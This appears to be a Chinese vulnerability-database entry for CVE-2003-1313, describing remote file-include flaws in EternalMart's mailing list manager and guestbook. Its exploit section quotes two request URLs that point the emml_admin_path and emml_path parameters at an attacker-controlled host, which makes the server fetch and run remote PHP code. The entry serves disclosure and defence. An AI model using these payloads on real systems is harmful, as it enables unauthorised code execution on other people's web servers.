EternalMart多个文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107502 漏洞类型 输入验证
发布时间 2003-10-04 更新时间 2006-12-28
CVE编号 CVE-2003-1313 CNNVD-ID CNNVD-200312-300
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23218
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-300
|漏洞详情
EternalMart包含邮件列表管理和客户留言本系统。EternalMart没有正确处理用户提交的请求,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。EternalMart邮件管理程序对用户提交的$emml_path变量缺少充分过滤,可导致远程攻击者提交恶意数据给$emml_path,包含攻击者指定的远程服务器上文件,以WEB权限在系统内执行任意PHP代码。另外EternalMart客户留言系统上对$emgb_admin_path变量也缺少过滤,同样存在上述问题。
|漏洞EXP
source: http://www.securityfocus.com/bid/8767/info

EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. 

http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php

http://[target]/emml_email_func.php?emml_path=http://[attacker] will
include the file :
http://[attacker]/class.html.mime.mail.php
|参考资料

来源:BID
名称:8767
链接:http://www.securityfocus.com/bid/8767
来源:VULNWATCH
名称:20031004EMML,EMGB:Include()hole
链接:http://www.securityfocus.com/archive/1/340244
来源:SECTRACK
名称:1007884
链接:http://securitytracker.com/id?1007884
来源:NSFOCUS
名称:5509
链接:http://www.nsfocus.net/vulndb/5509